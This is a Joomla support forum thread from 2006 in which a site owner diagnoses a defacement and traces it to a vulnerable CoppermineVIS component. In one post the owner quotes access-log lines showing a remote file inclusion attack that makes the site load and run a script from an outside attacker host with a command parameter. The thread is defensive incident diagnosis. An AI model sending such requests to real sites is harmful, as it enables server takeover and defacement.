Joomla! Discussion Forums



It is currently Tue Nov 24, 2009 6:11 pm (All times are UTC )

 


Forum rules

Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.



Post new topic Reply to topic  [ 9 posts ] 
Author Message
Posted: Thu Apr 13, 2006 10:29 pm 
User avatar
Joomla! Explorer
Joomla! Explorer
Offline

Joined: Sun Aug 28, 2005 2:55 pm
Posts: 321
Location: Barrie, Ontario CANADA
My site was hacked, so that visitors would see a plain white screen with this text:

A1TS /home/clements Ownz /home/clements :: by Shaka

It appears that only the index.php file was over written. I could still access the back end and all the content was still there. As well, a second installation of Joomla (1.0.7) in a sub domain remained untouched.

Details:

Joomla 1.0.8
PHP 4.4.1
MySQL 4.1.14-standard-log
Apache 1.3.34 (Unix)

Site is hosted by http://www.bluehost.com and is shared hosting.

I have access to the “Raw Access Logs” through cpanel, but have trouble sorting through the text. (Is there some sort of application that organizes that data?)

I have the following components installed on the site: AKObook 3.42 with the hack to add the security codes; Coppermine 1.4.3; CoppermineVIS Premium 1.30; joomlaXplorer 1.3.2; mosCE 1.0.3; PU Arcade.

Hmm… I *did* have JCE editor installed, but it seems to have vanished.

I have the following mambots installed: MGM Image Gallery; Imbed PHP (kl_php);  the usual regular stuff.

My service provider told me this: My Fantastico control panel indicates I have Coppermine 1.3.4 and Joomla 1.0.3 installed. Those are the last versions I had installed via Fantastico before I started doing it myself. The tech support guy claimed that this is how the kiddie got in and told me to uninstall those old versions through Control Panel if I had manually installed newer versions myself. I am 99.999% sure that if I do that, I will be uninstalling my existing versions. He told me to do a full back up download, uninstall, then reinstall from the back up to clean it up, making the additional claim that I needed to do this because they probably got into my databases, too. Hmmm. Is this good advice?

Meanwhile, they did a restore and the site is back. I think if I just had a copy of the index.php file I could have uploaded it.

One more piece of information: I use .htaccess to protect the admin folder, so I have to login twice when accessing the backend, once to get through .htaccess, and once to get into Joomla.

The big question is: Where is the weak point that allowed this to happen?


Edit: title of post

_________________
http://www.clements.on.ca (Family website on J1.0.x)
http://www.jdanielclements.com (Personal photography site on J1.5.x)


Last edited by Klementz on Fri Apr 14, 2006 4:11 am, edited 1 time in total.

Top
   
 
Posted: Thu Apr 13, 2006 11:48 pm 
User avatar
Joomla! Virtuoso
Joomla! Virtuoso
Offline

Joined: Fri Sep 16, 2005 8:41 pm
Posts: 3652
Location: NRW - Germany
Have you read the sticky in this forum?

_________________
god doesn't play dice with the universe. not after that drunken night with the devil where he lost classical mechanics in a game of craps.

Since the creation of the Internet, the Earth's rotation has been fueled, primarily, by the collective spinning of English teachers in their graves.


Top
   
 
Posted: Fri Apr 14, 2006 12:07 am 
User avatar
Joomla! Explorer
Joomla! Explorer
Offline

Joined: Sun Aug 28, 2005 2:55 pm
Posts: 321
Location: Barrie, Ontario CANADA
Hackwar wrote:
Have you read the sticky in this forum?


Yes. And I carefully gathered all the information requested. Did I miss something? I thought I was at this stage:

[quote=∓quot;Sticky Note"\]
I have checked all this, what can I do now?
Ok, you have collected all the files, you are sure that its Joomla and not your or your providers configuration that has caused the hacker to gain access to your server and you also have eliminated all third party extensions as source of the vulnerability. Now wrap all that information up in a nice mail and send it to security [at] joomla [dot] org. With this mailinglist you reach the developers and they will investigate this further.[/quote]

Obviously I can't really tell if it was a Bluehost vulnerability and I am trying to find out if the problem lies in my installation.

Was I not supposed to ask for help here?

_________________
http://www.clements.on.ca (Family website on J1.0.x)
http://www.jdanielclements.com (Personal photography site on J1.5.x)


Top
   
 
Posted: Fri Apr 14, 2006 12:22 am 
User avatar
Joomla! Virtuoso
Joomla! Virtuoso
Offline

Joined: Fri Sep 16, 2005 8:41 pm
Posts: 3652
Location: NRW - Germany
Sorry, no, it was okay. I'm just a bit sleepy... I can't really help you. Lets hope someone else can. I think someone will tomorrow... ;)

_________________
god doesn't play dice with the universe. not after that drunken night with the devil where he lost classical mechanics in a game of craps.

Since the creation of the Internet, the Earth's rotation has been fueled, primarily, by the collective spinning of English teachers in their graves.


Top
   
 
Posted: Fri Apr 14, 2006 2:09 am 
User avatar
Joomla! Enthusiast
Joomla! Enthusiast
Offline

Joined: Tue Nov 08, 2005 10:44 pm
Posts: 178
Location: Madrid
Hi!

Remember, the configuration.php should be dont writable after you do modifications, it´s very important...

_________________
http://www.auto-hunter.es


Top
   
 
Posted: Fri Apr 14, 2006 2:51 am 
User avatar
Joomla! Hero
Joomla! Hero
Offline

Joined: Mon Aug 15, 2005 4:36 pm
Posts: 2399
Location: Marikina, Metro Manila, Philippines
There is possibly a security vulnerability within the CoppermineVIS component:
http://forum.joomla.org/index.php/topic,51714.0.html

This could have been the point of weakness, however you need to examine your access logs.

_________________
God grant me the Serenity to Accept the things I cannot change, the Courage to change the things I can and the Wisdom to know the Difference.


Top
  E-mail  
 
Posted: Fri Apr 14, 2006 4:10 am 
User avatar
Joomla! Explorer
Joomla! Explorer
Offline

Joined: Sun Aug 28, 2005 2:55 pm
Posts: 321
Location: Barrie, Ontario CANADA
The (not so) funny thing is, I wasn't even using that component any more. But I guess it was there, published on my site.

I don't know enough about these access logs, but I think this stuff may be the culprit:

POST /index.php?option=com_copperminevis&Itemid=1&place=gallery&option=com_copperminevis&Itemid=1&place=http%3A%2F%2Fxpl.netmisphere2.com%2Ftool.txt%3F&&s=r& HTTP/1.1" 200 17497

GET /index.php?option=com_copperminevis&Itemid=1&place=http://xpl.netmisphere2.com/tool.txt?&&s=r&cmd= HTTP/1.1" 200 13383 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

etc. etc. etc.

CoppermineVIS is now uninstalled.

Thank you!!

_________________
http://www.clements.on.ca (Family website on J1.0.x)
http://www.jdanielclements.com (Personal photography site on J1.5.x)


Top
   
 
Posted: Fri Apr 14, 2006 4:38 am 
Joomla! Intern
Joomla! Intern
Offline

Joined: Thu Aug 18, 2005 1:47 pm
Posts: 62
Did you patched copperminevis? It was vuneralbe but is already fixed! You be aware and watch for probs with the software you're using.
Look on joombla.com copperminevis is safe now if you download the recent version!


Top
   
 
Posted: Fri Apr 14, 2006 1:31 pm 
User avatar
Joomla! Explorer
Joomla! Explorer
Offline

Joined: Sun Aug 28, 2005 2:55 pm
Posts: 321
Location: Barrie, Ontario CANADA
Wil wrote:
Did you patched copperminevis?


No, I wasn't even using it. After I started using it, there was something about it that I didn't like (can't remember now). Therefore, it was just sitting there being ignored.

What I have learned is that a component doesn't actually need to be in use to be vulnerable. I am going to uninstall all the other stuff that is sitting on my site not being used.

_________________
http://www.clements.on.ca (Family website on J1.0.x)
http://www.jdanielclements.com (Personal photography site on J1.5.x)


Top
   
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 9 posts ] 

Quick reply

 



Who is online

Users browsing this forum: No registered users and 20 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group